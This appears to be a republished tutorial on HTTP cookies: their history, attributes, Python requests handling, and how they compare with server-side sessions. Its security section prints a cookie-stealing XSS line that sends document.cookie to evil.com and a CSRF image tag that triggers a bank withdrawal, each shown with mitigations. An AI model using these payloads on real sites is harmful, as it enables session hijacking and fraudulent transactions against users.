Mastering Web Cookies: From Basics to Python Manipulation
This article explains the origin, purpose, and inner workings of HTTP cookies, details their attributes and security implications, demonstrates how to create, retrieve, and set cookies with Python's requests library, and compares cookies with server‑side sessions for robust web development.
In a previous tutorial on a Youku bullet‑screen crawler we briefly mentioned cookies; this article provides a comprehensive overview of cookies (small data files) and related concepts.
1. Birth Background
HTTP is stateless, meaning the server cannot identify whether two requests come from the same browser. As the web evolved toward interactive applications, developers needed a way to remember user actions, leading to hidden fields and eventually to cookies.
Hidden field example: <input type="hidden" name="field_name" value="value">
In 1994, Lou Montulli at Netscape introduced cookies to store shopping‑cart history, and browsers gradually adopted the feature.
2. What Is a Cookie
A cookie is a piece of information sent by the server to the client and stored as a text file on the client. The browser includes the cookie in subsequent requests, allowing the server to track client state.
Cookies are mainly used for:
Session state management (e.g., login status, shopping cart, game scores).
Personalized settings (e.g., user preferences, themes).
Browser behavior tracking (e.g., analytics).
3. Cookie Principle
When a user logs in, the server validates credentials and returns a Set‑Cookie header. The browser saves the cookie and sends it back in the Cookie header on later requests.
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnlySubsequent request example:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzgThe server reads the cookie to identify the user, confirming that the user is logged in. Note that cookies are stored client‑side and can be modified, which poses security risks.
4. Cookie Attributes
A cookie consists of several attributes such as Name, Value, Domain, Path, Expires/Max‑Age, Size, HttpOnly, and Secure, each controlling its behavior.
1. Name & Value
The Name identifies the cookie; the server uses it to retrieve the corresponding Value.
2. Domain & Path
Domain restricts which hosts can access the cookie (e.g., .baidu.com vs. .tieba.baidu.com). Path limits the URL paths that can read the cookie (e.g., /test).
3. Expires/Max‑Age
Defines the cookie’s lifetime. Without a value, the cookie expires with the browser session.
4. Size
Represents the total character count of the name and value (e.g., id=666 has size 5).
5. HttpOnly
When true, the cookie is sent only in HTTP headers and cannot be accessed via document.cookie, helping mitigate XSS attacks.
6. Secure
When set, the cookie is transmitted only over HTTPS.
5. Python Operations on Cookies
1. Generating Cookies
After successful authentication, the server can set a cookie in the response header; the browser stores it automatically.
2. Retrieving Cookies
Using the requests library, r.cookies returns all cookies, and r.cookies.get_dict() provides them as a dictionary.
3. Setting Cookies
When crawling, you can copy the browser’s cookie string into a requests session to impersonate a logged‑in user.
6. Session
1. Birth Background
Because cookies are client‑side, visible, and modifiable, sessions were introduced to store user data securely on the server while using a cookie only for the session identifier.
2. What Is a Session
A session is a server‑side object identified by a session ID, which the server sends to the client as a cookie. The session persists until the user logs out or it times out.
Session workflow:
The first request creates a session and returns a session ID cookie.
Subsequent requests include the session ID, allowing the server to retrieve the stored data.
Sessions can be implemented via cookies or URL rewriting; the cookie method is illustrated in the diagram.
7. Interview Scenarios
1. Cookie vs. Session
Both enable client‑server interaction.
Cookies reside client‑side, are easy to forge, and less secure.
Sessions reside server‑side, consuming server resources.
Session implementation can use cookies or URL rewriting.
2. Security Issues Caused by Cookies
Session hijacking and XSS: attackers steal cookies to impersonate users. Example exploit:
(new Image()).src = "http://evil.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly cookies mitigate this.
CSRF: malicious requests triggered by a logged‑in user’s cookie. Example:
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">. Mitigations include hidden fields, confirmation steps, and short cookie lifetimes.
8. Summary
The article covered the fundamentals of cookies, their attributes, security considerations, how to manipulate them with Python’s requests library, and the relationship between cookies and server‑side sessions, providing a solid foundation for web crawling and web development.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
